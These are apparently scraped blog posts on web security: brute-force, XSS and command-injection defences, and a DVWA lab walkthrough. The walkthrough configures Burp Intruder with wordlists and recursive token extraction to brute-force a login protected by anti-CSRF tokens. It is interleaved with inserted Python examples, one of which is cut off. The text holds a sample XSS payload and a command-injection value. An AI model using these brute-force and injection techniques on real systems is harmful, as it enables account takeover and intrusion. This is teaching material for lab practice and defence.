The above is a small list targeting user credentials, but the patterns vary for other resources.\nDefending Brute Force Attacks # Brute force attacks are difficult to stop, but with good measures, we can limit the attack surface.\nAvoid Using Default/Guessable Passwords # One of the most commonly exploited weaknesses is that some application servers come with pre-defined default passwords for the initially created accounts (say \u0026ldquo;admin/password\u0026rdquo;).\nDefault Password Database - cirt.net\nSome companies follow an initial password pattern of the company name followed by a number sequence, say \u0026ldquo;ABCCompany123\u0026rdquo;, or with a special character, \u0026ldquo;ABCCompany123$\u0026rdquo;; some append the year of establishment to a username prefix, such as \u0026ldquo;Username2022\u0026rdquo;, etc.\nThese are all unknown until someone figures them out. Once figured out, they are easy to try out against all the user accounts.\nAdditionally, prevent users from using passwords such as \u0026ldquo;password\u0026rdquo;, \u0026ldquo;admin123\u0026rdquo;, \u0026ldquo;12345\u0026rdquo; etc.\nLimit Login Attempts # One good practice is to limit the number of failed login attempts the user is allowed to make. Beyond, say, 7 failed login attempts, the account is locked for a temporary time period, or, like banks, beyond three failed attempts the user account is locked out for 24 hours.\n👥The challenge with this type is that unauthorized users keep trying with valid user accounts and lock out genuine users. Enforce a Strong Password Policy # A well-designed password policy, such as requiring a combination of lower-case letters, upper-case letters, numerics, and special characters, will make passwords hard for attackers to crack.\nUse password managers wherever applicable. Avoid re-using the same password. The length of passwords should be 8 or above. Prevent the use of common dictionary words or guessable sequences. 
Use certificates for authentication rather than passwords. Educate users about using a different password for each account. Progressive Delay # This is another good technique, where the wait time keeps multiplying with each failed login attempt.\nSay, start with a \u0026ldquo;60 Seconds\u0026rdquo; wait time at the first failed attempt, then 15 minutes of wait time for the second attempt, 60 minutes for the third attempt, and so on.\nGenerally, some applications multiply wait seconds by 60 for each failed attempt.\nUsing Captcha # Captchas are used to filter automated bots or programs and prevent them from abusing the services.\n🤖This is a bit of an inconvenience, but solving a captcha will help verify that it\u0026rsquo;s a human and not automation. Multi-Factor Authentication # Adding additional layers of verification makes brute force attacks very tough. Using an OTP (one-time passcode), verification of a token through email, or security questions before logging in makes it more difficult for attackers.\nThe attacker needs to compromise multiple sources to gain access to your user accounts, which is very tough but not impenetrable.\nStoring Salted Password Hashes # Even though our application is secured in all possible ways, a third-party plugin or a disgruntled employee may lead to a compromise of the application; say the attacker was able to gain access to all the passwords in the database.\nWhen a user enters a password, say \u0026ldquo;admin123\u0026rdquo;, it is not good practice to store it as plain text. It must be hashed and stored.\nhash(admin123) = GX8N365FMeK9hsRkW9Dl2S/ikcQ Now add a salt to the password before hashing. The salt does not need to be a secret text, but it must be a random text. 
(say \u0026ldquo;5MU63YzoOm7ig\u0026rdquo;)\nThe Hash + Salt will be displayed as shown below.\nhash(admin123 + 5MU63YzoOm7ig ) = LL/0NIJmT2JcfCXkfOln62pj8Hw The salted hashes make it much more difficult for attackers to crack the passwords offline.\nEven though the attackers have the salted hashes, it would be tough for them to crack and re-use them. Meanwhile, requesting the user to reset the passwords in case of compromise makes it more secure.\nWhitelisting # Whitelisting, or allow-listing, is an approach of letting in only what you trust and blocking all the rest from accessing.\nLet\u0026rsquo;s say for high privileged admin user accounts, employ a way to whitelist the logins from known IP addresses or authorized VPNs and restrict all others from accessing admin features.\nThis reduces a huge attack surface.\nUsing Web application firewalls # Configuring and using Web Application Firewalls (WAFs) protects web applications from a wide range of attacks, such as brute force attacks, denial of service attacks, and malicious input filtering, etc. Examples: AWS WAF, Cloudflare WAF, etc.\nMore information on blocking brute force attacks can be found on the Blocking Brute Force Attacks OWASP site.\nConclusion # Understanding the basics of brute-force attacks and their potential impacts is crucial for safeguarding against cyber threats. By implementing robust security measures, such as strong password policies, multifactor authentication, and network monitoring, individuals and organizations can mitigate the risk of falling victim to a brute-force attack.\nUsing captchas can be an inconvenient feature, but use them judiciously to prevent automated bots and automated attacks. Hopefully by now you are familiar with what a brute force attack is and how it can be exploited.\nKeep Learning!! 
😄\n","date":"30 September 2022","externalUrl":null,"permalink":"/dvwa-brute-force-attack-and-prevention-explained/","section":"Posts","summary":"","title":"DVWA - Brute Force Attack and Prevention Explained","type":"posts"},{"content":"Cross-Site Scripting (XSS) is a serious security vulnerability. In short, attackers use this for a wide range of security attacks like stealing user session cookies, redirecting all the users to a malicious website, logging keystrokes of the victim\u0026rsquo;s activity, defacing an organization\u0026rsquo;s website, and can even use the victim\u0026rsquo;s system as a bot for malicious activity, etc.\nA single technique cannot mitigate the XSS vulnerability completely. Using the right defenses can help in preventing XSS attacks.\nOne of the best practices is \u0026ldquo;Defense-In-Depth\u0026rdquo;: enabling multiple layers of defense so that even if a layer fails, other layers of protection can minimize the impact of an XSS attack.\nUse Frameworks # In modern development practices, developers like to code faster and avoid reinventing the wheel.\nRather than building applications from scratch, using frameworks can protect the application from many vulnerabilities, as security features are built into frameworks and just need to be enabled.\nFor example, input validation checks, XSS prevention, preventing access control issues, etc. 
(Some PHP frameworks include Laravel, CodeIgniter, etc.)\nAdditionally, these frameworks do address security vulnerabilities when discovered; all you need to ensure is that you are using the latest version of the application framework.\nValidate Client Data # One of the most crucial steps is to validate each and every input received from the client.\nAs we have demonstrated throughout our articles, any data coming from the client side can be modified with the help of intercepting proxies.\nFor the same reason, each and every piece of data coming from the client must be validated before it flows through to the next steps of processing. Output Encoding # Output encoding is one of the techniques used to take user-controlled data and safely display it as text, without interpreting it as code.\nBelow is an example XSS payload.\n\u0026lt;script\u0026gt;alert(document.domain);\u0026lt;/script\u0026gt; The HTML-encoded text of the XSS payload will be displayed as shown below.\n\u0026amp;lt;script\u0026amp;gt;alert(document.domain);\u0026amp;lt;/script\u0026amp;gt; \u0026ldquo;\u0026lt;\u0026rdquo; changed to \u0026ldquo;\u0026amp;lt;\u0026rdquo; \u0026ldquo;\u0026gt;\u0026rdquo; changed to \u0026ldquo;\u0026amp;gt;\u0026rdquo; As the browser parses HTML, JavaScript, CSS, and URLs differently, each must be encoded according to its context.\nAnother good example: in PHP, the \u0026ldquo;htmlspecialchars\u0026rdquo; function will convert the \u0026ldquo;\u0026lt;\u0026rdquo; less than and \u0026ldquo;\u0026gt;\u0026rdquo; greater than symbols to HTML entities such as \u0026ldquo;\u0026amp;lt;\u0026rdquo; for less than and \u0026ldquo;\u0026amp;gt;\u0026rdquo; for greater than respectively. This again makes the application treat everything as text without breaking the syntax.\nURL, HTML, JavaScript, and CSS can each be encoded.\nSanitization # In some cases, the users need to retain HTML code as it is. 
In this case, the output encoding will break the document structure.\nTo retain the data as it is, the sanitization technique is used.\nSanitization produces a new HTML document that contains only the \u0026ldquo;safe\u0026rdquo; or allowed HTML tags. This prevents XSS; it is performed in combination with the whitelist and blacklist approach.\nFor example, in PHP the \u0026ldquo;strip_tags\u0026rdquo; function filters out all the HTML tags, and the \u0026ldquo;addslashes\u0026rdquo; function escapes special characters like single and double quotes with backslashes to retain them as text without breaking code syntax.\nXSS Header # The X-XSS-Protection response header is one of the features used to prevent reflected XSS from executing.\nBelow is an example of enabling the XSS protection header by completely blocking script execution.\nX-XSS-Protection: 1; mode=block The above can be ignored if a strong \u0026ldquo;Content-Security-Policy\u0026rdquo; is being used.\nHTTPOnly - Cookie Attribute # This is another cookie flag that helps in reducing the XSS impact. Enabling the \u0026ldquo;HTTPOnly\u0026rdquo; flag for session cookies prevents JavaScript code from accessing them.\nContent-Type # Content-Type is one of the response headers which specifies the type of content delivered. It is recommended to set the content type of JSON responses to \u0026ldquo;application/json\u0026rdquo; rather than \u0026ldquo;text/html\u0026rdquo;.\nContent-Type: application/json Setting the content type to \u0026ldquo;application/json\u0026rdquo; prevents the execution of script tags. Content Security Policy (CSP) # Content Security Policy is an added layer of security protection. This helps in detecting and mitigating XSS and other code injection attacks.\nCSP instructs the browser on how to deal with the content. 
On CSP-enabled websites, exploiting an XSS vulnerability becomes much harder, because even a successfully injected script is refused by the browser unless the policy allows its source.\nThe server adds a Content-Security-Policy header carrying the policy configuration.\nContent-Security-Policy: default-src \u0026#39;self\u0026#39;; img-src *; script-src userscripts.example.com The above example instructs the browser to load content only from the same origin by default, to load images from anywhere, and to execute scripts only from \u0026ldquo;userscripts.example.com\u0026rdquo;. Because \u0026#39;unsafe-inline\u0026#39; is not present in script-src, inline scripts such as an injected \u0026lt;script\u0026gt; block or an onerror attribute are blocked as well; if the application needs inline scripts, prefer nonces or hashes over \u0026#39;unsafe-inline\u0026#39;. Whitelisting rather than Blacklisting # Whitelisting, or allowing only known good, is the approach of letting through only what you trust and rejecting everything else.\nWhitelisting is a supporting step that adds to all the defense layers above. Even against unknown payloads a whitelist defends well, whereas a blacklist only stops what it has already seen.\nFor example, allow the trusted characters such as upper case letters, lower case letters, numerals, and only the specific special characters the field needs.\nLimit use of blacklists to reasonable business requirements.\nUse Web Application Firewalls (WAFs) # Configuring and using a Web Application Firewall protects web applications from a wide range of attacks like XSS, brute force, denial of service, malicious input, and 
a lot more.\nExamples include AWS WAF, Cloudflare WAF, etc. A WAF is a defense-in-depth layer, not a replacement for fixing the vulnerable code: filter bypasses are common, so keep the output encoding and validation in place.\nAdditional References: # More information on mitigating XSS attacks can be found on the OWASP site.\nCross Site Scripting Prevention - OWASP Cheat Sheet DOM based XSS Prevention - OWASP Cheat Sheet ","date":"20 August 2022","externalUrl":null,"permalink":"/mitigating-xss-vulnerability/","section":"Posts","summary":"","title":"Mitigating XSS Vulnerability","type":"posts"},{"content":"In this post, we will be covering the ways available to mitigate the command injection vulnerability.\nFirst, we will go through the standard practices that are generally used for mitigating command injection vulnerabilities, and then we will cover how the vulnerability has been fixed in the DVWA application.\nAvoid Calling OS Command Directly # One of the most effective ways is to avoid passing user input to system commands at all.\nUsing the language\u0026rsquo;s built-in library functions is a good option, as they perform the intended task without invoking a shell that the input could tamper with.\nIn our command injection examples, the application takes a domain name or IP address, and we could append additional system commands to it. The application does not filter the input and passes it directly to the server for execution.\nIf you view the source code, the \u0026ldquo;shell_exec()\u0026rdquo; function in PHP is being used to take the user input and pass it to the server.\nshell_exec( \u0026#39;ping -c 4 \u0026#39; . USER_INPUT ); The escapeshellarg() function can be used together with shell_exec() to reduce the risk: it wraps the value in single quotes and escapes any embedded single quotes, so the shell treats it as one argument rather than breaking it into multiple commands. escapeshellcmd() escapes the shell metacharacters in a whole command string but does not stop an attacker from adding extra arguments, so escapeshellarg() is the one to apply to each user-supplied value. Neither function replaces validating the input.\nIf you think that in your current scenario you cannot avoid calling the OS command and that is the only way to go ahead, then there are other ways to mitigate it. Whitelisting # As we covered whitelisting earlier. 
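As an added example that is neither DVWA's nor the post's own code, here is the same "ping a target" feature in Python. shlex.quote plays the role of PHP's escapeshellarg(), and the shell-free argument list combined with allowlist validation is the whitelisting and parameterization approach the post goes on to describe. The function names and the sample inputs are assumptions for illustration:

```python
# Added example (not the page's PHP): the same "ping a target" feature in Python,
# showing the vulnerable pattern, escapeshellarg()-style quoting, and the fix
# (allowlist validation plus a shell-free argument list). Function names are mine.
import ipaddress
import shlex
import subprocess
from typing import List


def vulnerable_ping_command(target: str) -> str:
    """The DVWA pattern: concatenation handed to a shell (shell_exec / shell=True).
    A target of '127.0.0.1; id' becomes two commands."""
    return "ping -c 4 " + target


def quoted_ping_command(target: str) -> str:
    """shlex.quote plays the role of PHP's escapeshellarg(): the value is wrapped
    in single quotes (embedded quotes escaped) so the shell sees exactly one
    argument. Chaining is stopped, but any string still reaches ping."""
    return "ping -c 4 " + shlex.quote(target)


def validate_ipv4(target: str) -> str:
    """Allowlist validation: accept only a well-formed dotted-quad IPv4 address.
    ipaddress rejects hostnames, whitespace, exponents such as 1e3, option-like
    values starting with '-', and anything with fewer or more than four octets."""
    addr = ipaddress.ip_address(target)  # raises ValueError for anything else
    if addr.version != 4:
        raise ValueError("only IPv4 targets are accepted")
    return str(addr)


def is_safe_target(target: str) -> bool:
    """True when validate_ipv4() accepts the value."""
    try:
        validate_ipv4(target)
    except ValueError:
        return False
    return True


def build_ping_argv(target: str) -> List[str]:
    """Parameterized form: the command and its data are separate argv elements and
    no shell is involved, so shell metacharacters in target are never interpreted."""
    return ["ping", "-c", "4", validate_ipv4(target)]


def run_ping(target: str) -> str:
    """Run the validated command without a shell and return its output."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True, text=True,
                          timeout=30, check=False)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    for candidate in ("127.0.0.1", "127.0.0.1; id", "1e3.1.1.1", "-c 1000000 10.0.0.1"):
        print(f"{candidate!r:25} safe={is_safe_target(candidate)}")
```

The quoting step alone is deliberately shown as insufficient: with escapeshellarg()-style quoting a value such as a hostname is still passed through, so validation decides what may reach the command, and the argv list decides that nothing in it is ever parsed as shell syntax.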
Whitelisting is an approach of letting through only what you trust and rejecting everything unknown.\nAllow only the valid characters, such as lower case letters, upper case letters, and numerals. Limit the special characters to the ones that are actually needed (say, allow the period \u0026ldquo;.\u0026rdquo; and reject all others). Allow only the system command that the user is supposed to run. In the command injection \u0026ldquo;high\u0026rdquo; example, we saw that blacklisting is used to filter a number of characters, for example the \u0026ldquo;|\u0026rdquo; pipe only when it is followed by a SPACE rather than the \u0026ldquo;|\u0026rdquo; pipe on its own, which is why it could be bypassed.\nBlacklisting can be used but is a more error-prone approach.\nStrong Input Validation # Validating the inputs in conjunction with whitelisting provides a strong defense.\nTreat every input from the client as something that can be tampered with, and verify that it is clean of all types of malicious payloads before use.\nParameterization is an option where the command and the input data are segregated using a structured mechanism, such as passing the command and its arguments as a list to an API that does not invoke a shell. This keeps the input as data, so it is never interpreted as part of the command line.\nNever escape user input against metacharacters by hand, as it is error-prone.\nAdditionally, regular expressions can be used to validate the input format before processing, anchored to the whole string so nothing can be appended.\nLeast Privilege User Account # Use a user account with the minimal privileges needed to execute the required system operations on the server rather than one with admin privileges, so a successful injection does not immediately yield full control of the host.\nCommand Injection - Fix (DVWA) # Let\u0026rsquo;s see how the vulnerability was fixed in the DVWA application.\nLog into the DVWA application and set the security level to \u0026ldquo;Impossible\u0026rdquo;.\nNavigate to \u0026ldquo;Command Injection\u0026rdquo; and click on the \u0026ldquo;View Source\u0026rdquo; button at the bottom.\nNote, only the partial code is displayed below. 
// Split the IP into 4 octets\n$octet = explode( \u0026#34;.\u0026#34;, $target );\n// Check IF each octet is an integer\nif( ( is_numeric( $octet[0] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[1] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[2] ) ) \u0026amp;\u0026amp; ( is_numeric( $octet[3] ) ) \u0026amp;\u0026amp; ( sizeof( $octet ) == 4 ) ) {\n    // If all 4 octets are int\u0026#39;s put the IP back together.\n    $target = $octet[0] . \u0026#39;.\u0026#39; . $octet[1] . \u0026#39;.\u0026#39; . $octet[2] . \u0026#39;.\u0026#39; . $octet[3];\n    // Determine OS and execute the ping command.\nCode Snippet 1: Command Injection - Mitigation In the above snippet, the developer has removed the blacklisting approach entirely and moved to a whitelist.\nNow only numeric octets joined by dots are allowed, and all other input is rejected. Since the value passed to ping is rebuilt from the four validated octets rather than taken from the raw input, nothing else from the original string reaches the command.\nThis reduces the attack surface for exploitation to a great extent. One caveat: is_numeric() also accepts signs, decimals, exponents such as \u0026ldquo;1e3\u0026rdquo; and leading whitespace, so an even stricter check would use ctype_digit() with a 0 to 255 range test per octet, or filter_var() with FILTER_VALIDATE_IP.\nMore information about the mitigation techniques can be found on the OS Command Injection Defense - OWASP Cheat Sheet.\nI hope you can now secure your web applications from command injection vulnerabilities. Thank you! :)\n","date":"10 August 2022","externalUrl":null,"permalink":"/mitigating-command-injection/","section":"Posts","summary":"","title":"Mitigating Command Injection","type":"posts"},{"content":"This section will be a kind of recap of the Brute Force vulnerability covered so far and some additional fine-tuning options available in the BurpSuite tool.\nRequired Tool Set # A working DVWA docker image will be needed. BurpSuite Community Edition tool. 
Wordlists (usernames.txt and passwords.txt) If you are unable to follow any of the sections, refer back to the earlier posts.\nDVWA - Brute Force Attack and Prevention Explained This detailed guide explains Brute Force Attacks, how they work, and ways to prevent them.\nDVWA Brute Force Attack - Medium This detailed post explains the Medium severity level of Brute-Force Attacks using DVWA and how partial security fixes can be bypassed.\nDVWA Brute Force Vulnerability - Demo # Log into your DVWA environment, and click on the \u0026ldquo;Security level\u0026rdquo; menu on the left sidebar.\nSelect \u0026ldquo;High\u0026rdquo; and click on the submit button, as shown below, to ensure the Security Level is updated.\nFigure 1: Setting DVWA Security Level to High Re-testing Scenario # Imagine the development team returning again and informing you that the vulnerability is fixed and needs re-verification.\nLet\u0026rsquo;s go ahead and repeat all the steps.\nLaunch the BurpSuite Community tool. Navigate to the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; \u0026ldquo;Intercept\u0026rdquo; sub-tab and click on \u0026ldquo;Open Browser\u0026rdquo;. Once the Chromium browser is launched, log in to the DVWA application using the admin credentials. Visit the \u0026ldquo;Brute Force\u0026rdquo; link in the menu. Switch to the Burp Suite \u0026ldquo;Proxy\u0026rdquo; tab, select the \u0026ldquo;Intercept\u0026rdquo; sub-tab, and toggle \u0026ldquo;Intercept is Off\u0026rdquo; to enable it. Enter random values in the username and password fields, then click on \u0026ldquo;Login\u0026rdquo;. The captured login request will be displayed in the \u0026ldquo;Intercept\u0026rdquo; view as shown below. Figure 2: Brute Force Login Request - Security Level High In line number 1, the test values are placed in the username and password fields. 
In line 16, the security level parameter is set to high.\nAdditionally, a new \u0026ldquo;user_token\u0026rdquo; parameter is being passed in the URL compared to the previous requests.\nA copy of the previous request is provided below.\nFigure 3: Brute Force Login Request - Security Level Medium Click on the \u0026ldquo;Action\u0026rdquo; button or right-click and select \u0026ldquo;Send to Intruder\u0026rdquo;.\nIn payload positions, \u0026ldquo;Clear\u0026rdquo; all the selected payload placeholders, then select the \u0026ldquo;Username\u0026rdquo; value field and the \u0026ldquo;Password\u0026rdquo; value field and click the \u0026ldquo;Add\u0026rdquo; button to mark them for custom payloads.\nSet the attack type to \u0026ldquo;Cluster bomb\u0026rdquo;.\nThe same word lists of common usernames and passwords can be used for the current scenario. Save the text files onto your system or use copy-paste to load the information in the payloads tab.\nusernames.txt\nadmin\nadministrator\nuser\njohn\ndvwa\nbob\nalice\nroot\nsuperuser\nsuper\npasswords.txt\nadmin\nadmin123\npassword\npassword123\nuser\nuser123\nadministrator\npassw0rd\nr3m3mb3rM3\nadmin123$\nIn the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 1\u0026rdquo;, set the payload type to \u0026ldquo;Simple list\u0026rdquo;, and paste the contents of usernames.txt into the payload options.\nNext, still in the \u0026ldquo;Payloads\u0026rdquo; sub-tab, select \u0026ldquo;Payload Set 2\u0026rdquo;, set the payload type to \u0026ldquo;Simple list\u0026rdquo;, and paste the contents of passwords.txt into the payload options.\nSwitch to the \u0026ldquo;Options\u0026rdquo; sub-tab and enable \u0026ldquo;Grep - Match\u0026rdquo; with the \u0026ldquo;incorrect\u0026rdquo; string 
so we can see which requests have failed.\nFigure 4: Intruder Grep Match - Incorrect string Lastly, click on \u0026ldquo;Start Attack\u0026rdquo; and monitor the results.\nFailed Intruder Attack Results # The \u0026ldquo;username and/or password incorrect\u0026rdquo; string was found in only one response.\nFor all other requests, we are getting \u0026ldquo;302\u0026rdquo; status codes instead of \u0026ldquo;200 OK\u0026rdquo;, which means something is not working and our brute force attack is failing.\nNow, shall we assume that the \u0026ldquo;Vulnerability is fixed\u0026rdquo; and close the security flaw?\nWell, we could close it. But this is a strange scenario in which we don\u0026rsquo;t see errors or warnings.\nLet\u0026rsquo;s analyze more thoroughly and see what exactly is happening here, and why we are getting \u0026ldquo;302 Found\u0026rdquo; redirects.\nRemember, you can only automate if the application behaviour is consistent. Re-submit the username and password with new random values on the Brute Force login page and intercept the login request.\nAnalyzing in the BurpSuite tool without going to the browser gives us more control over the HTTP messages. 
Therefore, I want to view the HTTP response messages in Burp Suite itself.\nLet\u0026rsquo;s enable the option to intercept and view the \u0026ldquo;Response\u0026rdquo; messages received from the server before they are sent to the browser.\nVisit the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; select the \u0026ldquo;Options\u0026rdquo; sub-tab, scroll down to \u0026ldquo;Intercept Server Responses\u0026rdquo; and enable \u0026ldquo;Intercept responses based on the following rules\u0026rdquo; as displayed below.\nFigure 5: BurpSuite Proxy - Enable Intercept Server Responses Switch to the \u0026ldquo;Intercept\u0026rdquo; sub-tab under the \u0026ldquo;Proxy\u0026rdquo; tab and click on the \u0026ldquo;Forward\u0026rdquo; button.\nThe \u0026ldquo;Forward\u0026rdquo; button sends the request to the server; Burp then immediately intercepts the HTTP \u0026ldquo;Response\u0026rdquo; received from the server and displays it as shown below.\nClicking the \u0026ldquo;Forward\u0026rdquo; button again sends the response on to the browser.\nToggle \u0026ldquo;Intercept is on\u0026rdquo; to disable the proxy intercept.\nUsing the BurpSuite \u0026ldquo;Chromium browser\u0026rdquo; session, manually try random username/password pairs, say \u0026ldquo;administrator/admin123\u0026rdquo;, \u0026ldquo;admin/admin123\u0026rdquo;, \u0026ldquo;user/user123\u0026rdquo; etc., for 4 or 5 incorrect credentials.\nFor all incorrect attempts, we keep getting the \u0026ldquo;Username and/or password incorrect.\u0026rdquo; message. This confirms that the \u0026ldquo;Brute Force\u0026rdquo; weakness still exists, which means the vulnerability remains open. Yay!! 
:) Now the question is, why is our Intruder tool unable to pick it up?\nLet\u0026rsquo;s review all the previous HTTP messages and see if we can find any patterns.\nThe Burp Suite HTTP message history can be found under the \u0026ldquo;Proxy\u0026rdquo; tab -\u0026gt; \u0026ldquo;HTTP history\u0026rdquo; sub-tab.\nFigure 6: BurpSuite HTTP History Observing the HTTP GET requests that we tried manually, the username and password values are being passed as before, but one parameter value keeps changing in the \u0026ldquo;URL\u0026rdquo; section.\nRemember the new parameter being passed in the login request? Yes, \u0026ldquo;user_token\u0026rdquo;.\nThe \u0026ldquo;user_token\u0026rdquo; is updated for each request, and the server only accepts the token it issued in its previous response; a request carrying a stale token is answered with the \u0026ldquo;302 Found\u0026rdquo; redirect we saw. Therefore, we cannot reuse the same \u0026ldquo;user_token\u0026rdquo; for all HTTP requests.\nThis is the reason our tool fails while the manual attempts work: the browser picks up the fresh token from each page it loads.\nFinding the origin of \u0026ldquo;user_token\u0026rdquo; # Let\u0026rsquo;s find out where the \u0026ldquo;user_token\u0026rdquo; is being set and updated.\nIn HTTP, such a value can be set in headers, response bodies, or cookies. Let\u0026rsquo;s review the HTTP responses received one by one.\nFigure 7: Finding User Token After a thorough review of one of the responses in the HTTP history, I was able to find out that it is being set in the \u0026ldquo;HTTP Response Body\u0026rdquo;:\n\u0026lt;input type=\u0026#39;hidden\u0026#39; name=\u0026#39;user_token\u0026#39; value=\u0026#39;90f9f7a06213b032dbe9e5d1d4717ce0\u0026#39; /\u0026gt; This is a simple hidden HTML input field on the \u0026ldquo;Login\u0026rdquo; page that is submitted every time the user sends the \u0026ldquo;username\u0026rdquo; and \u0026ldquo;password\u0026rdquo; credentials.\nBased on the above response, the HTML input tag is generated dynamically with a fresh \u0026ldquo;user_token\u0026rdquo; on every page load.\nWe found the source! Can you automate it with Burp Intruder? 
Yes.\nOne more important point to discuss before we proceed. Choosing the Intruder Attack Type # Guess what the attack type could be here?\nCluster Bomb? NO\nFigure 8: Pitchfork vs Cluster Bomb Remember what the \u0026ldquo;Cluster bomb\u0026rdquo; does? It tries every combination: it holds \u0026ldquo;Payload 1\u0026rdquo; fixed while iterating through all of \u0026ldquo;Payload 2\u0026rdquo;, then moves to the next \u0026ldquo;Payload 1\u0026rdquo; value and repeats. The big challenge here is that the \u0026ldquo;user_token\u0026rdquo; cannot be the same for multiple requests, so the token position must advance exactly once per request, in lockstep with the password.\nTherefore, \u0026ldquo;Cluster bomb\u0026rdquo; doesn\u0026rsquo;t meet our requirements.\nWhat about \u0026ldquo;Pitchfork\u0026rdquo;? # Yes, the \u0026ldquo;Pitchfork\u0026rdquo; option helps in the current scenario. It takes the first payload from \u0026ldquo;Payload set 1\u0026rdquo; together with the first payload from \u0026ldquo;Payload set 2\u0026rdquo;, then the second of each, and so on.\nBecause of that, our current wordlists of usernames and passwords would generate only 10 payload requests, as shown below, and we could miss the valid combination, i.e. \u0026ldquo;admin/password\u0026rdquo;.\nSo, to brute force from here on, we fix the username to one that definitely exists on the server (say \u0026ldquo;admin\u0026rdquo;) and pair the password list with the token instead.\nThe DVWA dev team gave us a good challenge. Let\u0026rsquo;s put in the additional effort to perform the Brute Force attack.\nFine-tuning the Intruder Payload # Repeat steps 1 to 7 mentioned above, from launching BurpSuite to sending the new login request to Intruder.\nUse a completely new intercepted login request, otherwise the token it carries is already stale and Intruder is bound to fail.\nChoose the \u0026ldquo;Pitchfork\u0026rdquo; attack type and select two payload positions, i.e. 
the password value field and the user_token value field as displayed above.\nThis time, the first payload position is the password value field and the second is the user_token value field.\nSelect the \u0026ldquo;Payloads\u0026rdquo; sub-tab, choose \u0026ldquo;Payload Set 1\u0026rdquo;, set the payload type to \u0026ldquo;Simple list\u0026rdquo; and paste the contents of passwords.txt into the payload options.\nNext, select \u0026ldquo;Payload Set 2\u0026rdquo; and set the payload type to \u0026ldquo;Recursive grep\u0026rdquo;. This is for the \u0026ldquo;user_token\u0026rdquo; field.\n\u0026ldquo;Recursive grep\u0026rdquo; is used when you want to extract specific data from the previous response and use it as the payload in the next request.\nThe \u0026ldquo;Grep - Extract\u0026rdquo; feature is used to find specific strings based on a start/end pattern or a regular expression and pull useful information out of the HTTP response.\nFigure 9: Grep Extract - Add Next, go to the \u0026ldquo;Intruder\u0026rdquo; tab -\u0026gt; \u0026ldquo;Options\u0026rdquo; sub-tab, scroll down to \u0026ldquo;Grep - Extract\u0026rdquo; and click on the \u0026ldquo;Add\u0026rdquo; button.\nA new window named \u0026ldquo;Define extract grep item\u0026rdquo; is loaded.\nIn the \u0026ldquo;Define extract grep item\u0026rdquo; window, click on the \u0026ldquo;Fetch response\u0026rdquo; button on the right side.\n\u0026ldquo;Fetch response\u0026rdquo; sends the currently configured request and loads the server\u0026rsquo;s response for it.\nOnce the HTTP response is loaded, use the mouse to select only the user_token value string, highlighted as shown below.\nThe \u0026ldquo;Start after expression\u0026rdquo; and \u0026ldquo;End at delimiter\u0026rdquo; values will be auto-populated. 
Just click on the \u0026ldquo;OK\u0026rdquo; button to proceed.\nUse \u0026ldquo;Ctrl - c\u0026rdquo; to copy the token value \u0026ldquo;1802dab0e42ee4ef48e71d491981abb1\u0026rdquo;; it will be used as the initial payload.\nSwitch back to the Intruder Payloads section. Observe that the \u0026ldquo;Grep - Extract\u0026rdquo; pattern is now listed in \u0026ldquo;Payload Options\u0026rdquo;.\nNow, set the \u0026ldquo;Initial payload for first request\u0026rdquo; value to the token we copied earlier, the latest \u0026ldquo;1802dab0e42ee4ef48e71d491981abb1\u0026rdquo;. The first request has no previous response to extract from, so this seeds the chain; every later request takes its token from the response to the one before it.\nAll set, but there is one more thing to do.\nRemember, a new user_token can only be fetched if each request is sent one at a time after updating the token. If multiple concurrent requests are fired at once, the tokens are no longer obtained in sequence and every request after the first carries a stale one.\nIn the \u0026ldquo;Intruder\u0026rdquo; tab, \u0026ldquo;Resource Pool\u0026rdquo; is where we can fine-tune the number of threads to use, the delay between requests, etc.\nNavigate to the \u0026ldquo;Intruder\u0026rdquo; tab and select the \u0026ldquo;Resource Pool\u0026rdquo; sub-tab. Select \u0026ldquo;Create new resource pool\u0026rdquo; and name it \u0026ldquo;Brute Force Attack - High\u0026rdquo;.\nSet the \u0026ldquo;Maximum concurrent requests\u0026rdquo; to 1.\nDone, we have configured our Intruder; now click the \u0026ldquo;Start attack\u0026rdquo; button.\nWow!! finally accomplished. 😄\nThe Intruder configuration works, and we no longer see the \u0026ldquo;302 Found\u0026rdquo; redirect status codes being displayed.\nObserve the user_token value taken from the previous response, displayed in the extract column and updated in each request as \u0026ldquo;Payload 2\u0026rdquo;. 
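The same token chaining that the Pitchfork and recursive grep configuration above performs, as an added Python example that is not part of the original post. The DVWA server is replaced by a constructed in-memory stand-in (FakeDvwa) so that the script runs offline; its behaviour (a fresh user_token in every rendered page, a 302 for any login carrying a stale token, one valid credential pair) is modelled on what the HTTP history above showed, not copied from DVWA's source. The names, the fake server and the short password list are assumptions for illustration:

```python
# Added example (not part of the original post): scripting the Pitchfork +
# recursive-grep token chain. FakeDvwa is a constructed stand-in for DVWA's
# Brute Force page at level High so that this runs offline; it is not DVWA code.
import re
import secrets
from typing import Dict, List, Optional, Tuple

TOKEN_RE = re.compile(r"name='user_token' value='([0-9a-f]{32})'")
FAILURE_TEXT = "Username and/or password incorrect."
SUCCESS_TEXT = "Welcome to the password protected area of admin"


class FakeDvwa:
    """Models the behaviour seen in the HTTP history: every rendered page carries a
    fresh 32-hex user_token, a login carrying any other token is redirected (302),
    and only one username/password pair succeeds. Constructed for this example."""

    def __init__(self, username: str = "admin", password: str = "password"):
        self._creds = (username, password)
        self._token = secrets.token_hex(16)

    def _page(self, message: str) -> str:
        self._token = secrets.token_hex(16)  # rotate on every page render
        return (f"<pre>{message}</pre><form action='#' method='GET'>"
                f"<input type='hidden' name='user_token' value='{self._token}' /></form>")

    def get(self, params: Dict[str, str]) -> Tuple[int, str]:
        """(status, body) for GET /vulnerabilities/brute/ with the given query params."""
        if "Login" not in params:
            return 200, self._page("")                 # plain page load
        if params.get("user_token") != self._token:
            return 302, ""                              # stale token: redirect, no page
        if (params.get("username"), params.get("password")) == self._creds:
            return 200, self._page(SUCCESS_TEXT)
        return 200, self._page(FAILURE_TEXT)


def extract_token(body: str) -> Optional[str]:
    """The Grep - Extract step: pull the hidden user_token out of the HTML body."""
    m = TOKEN_RE.search(body)
    return m.group(1) if m else None


def naive_cluster_bomb(client, username: str, passwords: List[str]) -> List[int]:
    """What the first Intruder run did: capture one token and reuse it for every
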